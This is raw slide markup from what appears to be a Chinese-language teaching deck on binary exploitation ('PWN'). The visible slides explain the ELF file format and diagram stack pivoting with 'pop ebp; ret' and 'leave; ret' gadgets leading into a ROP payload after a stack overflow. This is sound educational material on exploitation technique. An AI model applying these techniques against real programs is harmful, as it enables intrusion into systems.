          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="9600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>PWN</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="9600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6A31576-E6B3-4285-B55D-F84E2EC6EFEC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="846406" y="3611879"/>
            <a:ext cx="4801314" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>二进制漏洞挖掘与利用</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="3" name="直接连接符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3280A9BA-BCD6-4321-9A3E-FB1EC931F899}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="792000" y="3425483"/>
            <a:ext cx="10800000"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998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1D6494D-206D-40FB-A712-9D891EE9484B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="700511" y="1720840"/>
            <a:ext cx="4916731" cy="3416320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-34290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ELF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>文件头表（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>ELF header</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记录了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>ELF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>文件的组织结构</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-34290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程序头表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段表（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Program header table</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告诉系统如何创建进程</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1"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生成进程的可执行文件必须拥有此结构</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1"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重定位文件不一定需要</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-34290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节头表（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Section header table</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记录了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>ELF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>文件的节区信息</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1"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用于链接的目标文件必须拥有此结构</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1"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其它类型目标文件不一定需要</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A38F7642-EE9E-4AD4-8769-C8C8F75C1F2F}"/>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6096000" y="664368"/>
            <a:ext cx="5395489" cy="5978785"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{154273AA-FF7C-421C-9120-340161B7F493}"/>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Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>下的可执行文件格式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>ELF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="265167016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1891" name="Shape 1891"/>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zh-CN" altLang="en-US" dirty="0"/>
              <a:t>栈迁移</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
              <a:t>: "pop ebp ret" + "leave ret"</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1892" name="Shape 1892"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8164700" y="4571167"/>
            <a:ext cx="2095200" cy="763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pop ebp ret</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1893" name="Shape 1893"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3394167" y="4751667"/>
            <a:ext cx="30004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pop ebp ; ret ;</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1894" name="Shape 1894"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1892" idx="1"/>
            <a:endCxn id="1893" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6394700" y="4952967"/>
            <a:ext cx="1770000" cy="3600"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1895" name="Shape 1895"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6729840" y="2276233"/>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ESP</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1896" name="Shape 1896"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7627107" y="2481033"/>
            <a:ext cx="537600" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1897" name="Shape 1897"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3394167" y="5816967"/>
            <a:ext cx="30004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stack overflow; ret;</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1898" name="Shape 1898"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1897" idx="0"/>
            <a:endCxn id="1893" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4894367" y="5161367"/>
            <a:ext cx="0" cy="655600"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1899" name="Shape 1899"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="939500" y="3200736"/>
            <a:ext cx="20952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600" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>mov   esp, ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>pop   ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="666666"/>
              </a:highlight>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1900" name="Shape 1900"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3393800" y="3265536"/>
            <a:ext cx="30004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leave ; ret ;</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1901" name="Shape 1901"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8164633" y="3088536"/>
            <a:ext cx="2095200" cy="763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leave ret</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1902" name="Shape 1902"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1893" idx="0"/>
            <a:endCxn id="1900" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4893967" y="3675267"/>
            <a:ext cx="400" cy="1076400"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1903" name="Shape 1903"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1901" idx="1"/>
            <a:endCxn id="1900" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="6394233" y="3470336"/>
            <a:ext cx="1770400" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1904" name="Shape 1904"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3200433" y="3318336"/>
            <a:ext cx="124400" cy="2904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05" name="Shape 1905"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8164633" y="3820100"/>
            <a:ext cx="2095200" cy="763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new stack addr</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1906" name="Shape 1906"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5110967" y="3942033"/>
            <a:ext cx="3000400" cy="5392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ebp = new stack addr</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1907" name="Shape 1907"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1900" idx="0"/>
            <a:endCxn id="1908" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="4894000" y="2316736"/>
            <a:ext cx="400" cy="948800"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1909" name="Shape 1909"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8164633" y="2488733"/>
            <a:ext cx="2095200" cy="290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new ebp value</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1908" name="Shape 1908"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3394167" y="1777533"/>
            <a:ext cx="30004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ROP payload 2</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1910" name="Shape 1910"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8164633" y="1907933"/>
            <a:ext cx="2095200" cy="290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1911" name="Shape 1911"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7556000" y="1665333"/>
            <a:ext cx="539200" cy="763600"/>
          </a:xfrm>
          <a:prstGeom prst="lef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1912" name="Shape 1912"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1911" idx="1"/>
            <a:endCxn id="1908" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="6394400" y="2047133"/>
            <a:ext cx="1161600" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1913" name="Shape 1913"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8164700" y="2198333"/>
            <a:ext cx="2095200" cy="290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gadget 1</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1914" name="Shape 1914"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8164633" y="1632451"/>
            <a:ext cx="2095200" cy="290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gadget N</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1915" name="Shape 1915"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10756800" y="2164725"/>
            <a:ext cx="848800" cy="9988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new stack addr</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1916" name="Shape 1916"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="10259833" y="2777525"/>
            <a:ext cx="425600" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1917" name="Shape 1917"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5164300" y="2605284"/>
